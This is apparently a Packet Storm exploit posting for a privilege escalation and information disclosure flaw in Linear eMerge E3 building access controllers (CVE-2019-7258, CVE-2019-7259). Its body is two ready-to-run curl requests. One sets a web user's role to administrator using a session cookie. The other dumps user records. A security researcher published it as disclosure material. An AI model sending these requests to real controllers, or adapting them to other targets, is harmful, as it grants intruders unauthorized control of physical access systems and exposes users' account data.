Linear eMerge E3 versions 1.00-06 and below suffer from a privilege escalation vulnerability.
86835112e9f40c6fc219f7da9213d813368778bb8c80f1b73abbda9f2613c556
Linear eMerge E3 Privilege Escalation
Affected version: <=1.00-06
CVE: CVE-2019-7258, CVE-2019-7259
Advisory: https://applied-risk.com/resources/ar-2019-005
by Gjoko 'LiquidWorm' Krstic
Escalate:
curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1
Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed